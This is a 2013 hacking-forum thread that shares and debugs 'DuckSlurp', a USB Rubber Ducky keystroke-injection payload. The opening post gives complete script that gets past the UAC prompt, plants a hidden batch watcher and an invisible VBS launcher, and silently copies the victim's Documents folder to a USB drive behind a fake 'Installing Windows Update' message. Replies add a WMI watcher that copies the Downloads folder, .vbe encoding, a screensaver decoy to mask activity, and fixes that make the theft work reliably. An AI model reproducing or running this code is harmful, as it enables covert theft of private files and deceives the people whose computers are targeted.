Darren Kitchen Posted August 27, 2013 Posted August 27, 2013 I wanted to follow up with Overwraith's Ducky Slurp payload with one slightly more discrete and accurate. Tested successfully on Win7 If you haven't seen the Duckly Slurp payload yet check it out here https://forums.hak5.org/index.php?/topic/29800-payload-duck-slurp-payload/?hl=slurp Basically this payload drops an invisible looping batch file on the target PC which waits for a USB drive labeled "DUCKY" to be inserted. Once the USB drive labeled "DUCKY" is inserted the file %duckyDRIVE%\DuckSlurp\DuckSlurp.bat is executed invisibly which copies all of the data from %userprofile%\documents Customize to your hearts content. Injection time in just a few seconds. REM Author: overwraith modified by dkitchen REM Name: DuckSlurp.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Uses googleknowsbests slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 REM *** Change directories because System32 appears to be protected. *** STRING CD %TEMP% ENTER REM *** Delete wait batch file if already exists *** STRING erase /Q DuckyWait.bat ENTER REM *** Make batch file that waits for SD card to mount. *** STRING copy con DuckyWait.bat ENTER STRING :while1 ENTER STRING @echo off ENTER STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if [%DUCKYdrive%] EQU [] ( ENTER STRING timeout /t 3 ENTER STRING goto :while1 ENTER STRING ) else ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 3 ENTER STRING goto :while1 ENTER STRING :break ENTER STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\ ENTER STRING wscript.exe invis.vbs %DUCKYdrive%\DuckSlurp.bat ENTER CONTROL z ENTER REM *** Delete Invisible vbs file if already exists *** STRING erase /Q invis.vbs ENTER REM *** Make VBS file to run invisibly *** STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM *** Run the batch file invisibly *** STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM *** Exit *** STRING EXIT ENTER Now make sure to label your USB drive "DUCKY" and create a folder on the root named "DuckSlurp" Within that folder create a batch file named "DuckSlurp.bat" containing the following: @echo off @echo Installing Windows Update set destination=%~d0\DuckSlurp\%COMPUTERNAME% mkdir %destination% if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Documents %destination% >>nul ) @cls @exit The payload actually runs this batch file using the invis.vbs wscript so it shouldn't be seen on screen, however if it were to be it would simply state "Installing Windows Update" briefly. Quote
overwraith Posted August 29, 2013 Posted August 29, 2013 Would the /Z option on xcopy work like I think it would and make it possible to do another pass on the target machine in case the whole file couldn't be grabbed the first time? C:\Users\Cameron>xcopy /? ... /Z Copies networked files in restartable mode. ... Quote
overwraith Posted August 29, 2013 Posted August 29, 2013 Just saw the ducky episode. Name pronounced over - wraith, like the critter that sucks out your soul! JK good episode. Quote
parkour86 Posted August 29, 2013 Posted August 29, 2013 (edited) I don't have a Ducky yet so I don't know if there's maybe a restriction but what's the purpose of having the standard flash drive? Couldn't we just backup the files to the sdcard on the Ducky? Edited August 29, 2013 by parkour86 Quote
overwraith Posted August 29, 2013 Posted August 29, 2013 Ducky storage is notoriously slow, and takes a while to mount. Adding an additional flash drive is much faster. Unless you want to be waiting 15 min until the computer's owner comes back... Quote
no42 Posted August 30, 2013 Posted August 30, 2013 In comparison the max speed of the Ducky is 150Kbits/sec (MMC speed) a fast SDIO license & software can reach 4MB/sec (27x faster), a fast USB Drive can achieve approx. 14MB/sec (96x faster). SDIO licenses are expensive $$$, unless a 3-letter acronym company would like to sponsor the Ducky! Quote
parkour86 Posted August 30, 2013 Posted August 30, 2013 That's very interesting, thanks for the information. Quote
Darren Kitchen Posted August 31, 2013 Author Posted August 31, 2013 I <3 TLAs. Also, what midnitesnake said. For hashdumping it's totally feasible, but when it comes to "backing up" a lot of data, an off-the-shelf USB drive is the way to go. Sure, we could re-engineer the duck to do USB3 speeds, but it would cost a metric buttload. Better off just using a 2nd thumbdrive. Quote
Bytewolf Posted September 1, 2013 Posted September 1, 2013 If you also want to hide the duckywait, you can put its functionality inside of a vbs as well. Ducky.vbs Set Shell = CreateObject( "WScript.Shell" ) Set fso = CreateObject("Scripting.FileSystemObject") Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colME = oWMI.ExecNotificationQuery("Select * from Win32_VolumeChangeEvent") ' Name of the Volume we are after strVolumeName = "BACKUPDISK" ' Watch for new Drives Do Set oLE = colME.NextEvent If oLE.EventType = 2 Then ' New Drive arrived Set d = fso.GetDrive(oLE.DriveName) If d.VolumeName = strVolumeName Then Shell.Run oLE.DriveName & "\backup.vbs" End If End If Loop Backup.vbs on the USB-Drive ' This Script must be on the USB-Drive in the root directory Set Shell = CreateObject( "WScript.Shell" ) Set fso = CreateObject("Scripting.FileSystemObject") ' Get the Userprofiledirectory & Computername strUP = Shell.ExpandEnvironmentStrings( "%USERPROFILE%" ) strCN = Shell.ExpandEnvironmentStrings( "%COMPUTERNAME%" ) strDRV = fso.GetDriveName(WScript.ScriptFullName) ' Create a subfolder on the USB-Drive if it doesn't exist If Not(fso.FolderExists (strDRV & "\Backup\" & strCN)) Then fso.CreateFolder strDRV & "\Backup\" & strCN End If ' Backup the Data (Overwrite existing files) fso.CopyFolder strUP & "\Downloads", strDRV & "\Backup\" & strCN & "\", vbTrue You can also encrypt vbs files to vbe. They will run just fine. http://www.ehow.com/how_8783926_convert-vbs-vbe.html Quote
Xcellerator Posted September 3, 2013 Posted September 3, 2013 Or just issue "start C:\Windows\System32\Ribbons.scr -s" at the start of the DuckSlurp.bat file on the usb. The screensaver will activate and the rest of the batch file will run behind it! Quote
B-rant Posted September 4, 2013 Posted September 4, 2013 Hey, I'm kinda a newbie and am having some issue getting this to work on my computer. I got everything to work on the Ducky just fine, it creates the file that waits for the flashdrive named DUCKY and runs the batch file. However, when the batch file runs all it does is create a folder called my computers name. It does not copy My Documents into the folder infact, the folder stays empty. I did not know what to do so I put a timeout in the batch file at the end of the code and ran it without the invis file to see what it did. This is what it said in the command prompt: Installing Windows Update Invalid number of parameters Then after the timeout, it closed. Not sure what is wrong but thought I would ask because its probably a very simple fix. Quote
Xcellerator Posted September 6, 2013 Posted September 6, 2013 Make a new DuckSlurp.bat file and paste this into it: @echo off set destination=%~d0\DuckSlurp\%COMPUTERNAME% mkdir %destination% if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Documents\test.txt %destination% >>nul ) @cls taskkill /f /IM cmd.exe @exit Make a text file in your documents called "test.txt". It seems that the DuckyWait.bat script is running fine as it's actually calling the right file on the USB, so just run this script (the one above) normally (not with the Ducky). This is the actual script from my personal setup, so I can confirm it works fine. If this works, then just change the line xcopy %USERPROFILE%\Documents\test.txt %destination% >>nul to xcopy %USERPROFILE%\Documents\* %destination% >>nul and it should copy over everything in documents. (The * is also called a 'wildcard' means everything in the directory) Quote
Ezniks Posted September 8, 2013 Posted September 8, 2013 Not working. When I plug my ducky in, everything is going right, but it stops with 'EXIT' in the command prompt (stays there and command prompt doesnt go away). When I plug the flash drive 'DUCKY' in, he copies nothing and there's no new folder... When I execute the Duckslurp.bat, he creates a folder, but no files. To encode, I used this commandline: java -jar encoder.java -l resources/be.properties -i input_file.txt -o inject.bin (v.2.6) Plz help me out. Quote
no42 Posted September 8, 2013 Posted September 8, 2013 (edited) Not working. When I plug my ducky in, everything is going right, but it stops with 'EXIT' in the command prompt (stays there and command prompt doesnt go away). When I plug the flash drive 'DUCKY' in, he copies nothing and there's no new folder... When I execute the Duckslurp.bat, he creates a folder, but no files. To encode, I used this commandline: java -jar encoder.java -l resources/be.properties -i input_file.txt -o inject.bin (v.2.6) Plz help me out. Prefix every line with STRING, and re-encode, then open notepad, make sure it remains the active window, while inserting the Ducky. the Ducky should then start typing into notepad. This output will enable us to do some debugging! Also are you Windows or Linux the \ or / after "resources" might make a difference? Edited September 8, 2013 by midnitesnake Quote
Ezniks Posted September 8, 2013 Posted September 8, 2013 Prefix every line with STRING, and re-encode, then open notepad, make sure it remains the active window, while inserting the Ducky. the Ducky should then start typing into notepad. This output will enable us to do some debugging! Also are you Windows or Linux the \ or / after "resources" might make a difference? Got the right "/" flag for Linux. ;) But I think there is something wrong with the brackets (due to keyboard properties?) duckywait.bat: :while1 @echo off :while1 for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) if ]%DUCKYdrive%[ EQU ][ ( timeout /t 3 goto :while1 ) else ( goto :break ) timeout /t 3 goto :while1 :break set DUCKYdrive=%DUCKYdrive%\DuckSlurp\ wscript.exe invis.vbs %DUCKYdrive%\DuckSlurp.bat Probably the brackets? And this for invis.vbs: CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False wscript.exe invis.vbs DuckyWait.bat EXIT CD %TEMP% Quote
Xcellerator Posted September 8, 2013 Posted September 8, 2013 Add a 100/200 ms delay after typing exit before hitting enter. I had this problem once, I fixed it by adding very short delays (eventually I worked out I only need 50ms ones). STRING exit DELAY 100 ENTER Quote
Ezniks Posted September 8, 2013 Posted September 8, 2013 Thanks, I'll try it! Isn't there something wrong with this (if ]%DUCKYdrive%[ EQU ][ ( ) line? Quote
no42 Posted September 8, 2013 Posted September 8, 2013 (edited) Thanks, I'll try it! Isn't there something wrong with this (if ]%DUCKYdrive%[ EQU ][ ( ) line? STRING if [%DUCKYdrive%] EQU [] ( looks like your [ ] square-brackets are the wrong way around try swapping ASCII_5B = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT // 91 [ ASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT // 92 ASCII_5D = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT // 93 ] with ASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT // 91 [ ASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT // 92 ASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT // 93 ] Edited September 8, 2013 by midnitesnake Quote
B-rant Posted September 9, 2013 Posted September 9, 2013 Make a new DuckSlurp.bat file and paste this into it: @echo off set destination=%~d0\DuckSlurp\%COMPUTERNAME% mkdir %destination% if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Documents\test.txt %destination% >>nul ) @cls taskkill /f /IM cmd.exe @exit Make a text file in your documents called "test.txt". It seems that the DuckyWait.bat script is running fine as it's actually calling the right file on the USB, so just run this script (the one above) normally (not with the Ducky). This is the actual script from my personal setup, so I can confirm it works fine. If this works, then just change the line xcopy %USERPROFILE%\Documents\test.txt %destination% >>nul to xcopy %USERPROFILE%\Documents\* %destination% >>nul and it should copy over everything in documents. (The * is also called a 'wildcard' means everything in the directory) Hey, I did just that, and it still does not seem to work. Here is a picture of what I did to confirm that I did it all correctly. I did add the wait to see what it was saying but with or without it, it does not seem to work. http://puu.sh/4nlp0.PNG Quote
Xcellerator Posted September 10, 2013 Posted September 10, 2013 Sorry, I should have been clearer. By default, windows hides the extension on files that it recognises. That means that the test.txt file in your documents is actually test.txt.txt. (It adds the .txt automatically). So rename the file in your documents so that it just says "test", rather than "test.txt". Xcopy shouldn't need any more parameters than that, so try in a command prompt, xcopy %USERPROFILE%\Documents\test.txt %USERPROFILE%\Desktop\ Which SHOULD copy test.txt to your desktop. Quote
B-rant Posted September 10, 2013 Posted September 10, 2013 Sorry, I should have been clearer. By default, windows hides the extension on files that it recognises. That means that the test.txt file in your documents is actually test.txt.txt. (It adds the .txt automatically). So rename the file in your documents so that it just says "test", rather than "test.txt". Xcopy shouldn't need any more parameters than that, so try in a command prompt, xcopy %USERPROFILE%\Documents\test.txt %USERPROFILE%\Desktop\ Which SHOULD copy test.txt to your desktop. Hey, thanks for your help by the way. I tried this in both Command Prompt and Powershell and both did not work. I really have no idea what is going wrong, but it is weird that powershell said it could not find the file. Here is a picture of what happened. http://puu.sh/4o4rP.PNG Quote
B-rant Posted September 11, 2013 Posted September 11, 2013 Hey I figured it out, my friend told me that it's because I have a space in my username. He was right, this works (xcopy "%USERPROFILE%\Documents\test.txt" "%USERPROFILE%\Desktop\") but this does not work (xcopy %USERPROFILE%\Documents\test.txt %USERPROFILE%\Desktop\) it needs the quotes to work. So, that is probably something you might want to change just incase you run into a computer with a two word user name. Thanks for the help. Quote
B-rant Posted September 11, 2013 Posted September 11, 2013 Ok so I tried changing the batch file so that it works with two word user names and also copy's sub directories in their documents as well, don't know if that's useful or not. @echo off@echo Installing Windows Updateset destination=%~d0\DuckSlurp\%COMPUTERNAME%mkdir %destination%if Exist "%USERPROFILE%\Documents" (xcopy /S "%USERPROFILE%\Documents" %destination% >>nul)@cls@exit Quote
Xcellerator Posted September 11, 2013 Posted September 11, 2013 That's great, the /S flag makes it recursive (similar to -R in *nix), and the double quotes encapsulate the whole string rather than breaking at the space. Thanks for sharing! Quote
ethereal Posted January 13, 2014 Posted January 13, 2014 (edited) okay, for whatever reason, invis.vbs can't be accessed when the ducky drive is inserted. It's there, in the temp folder, but isn't used. on inserting the drive named ducky, it errors out with a pop up, and then nothing happens. any ideas? Edited January 13, 2014 by ethereal Quote
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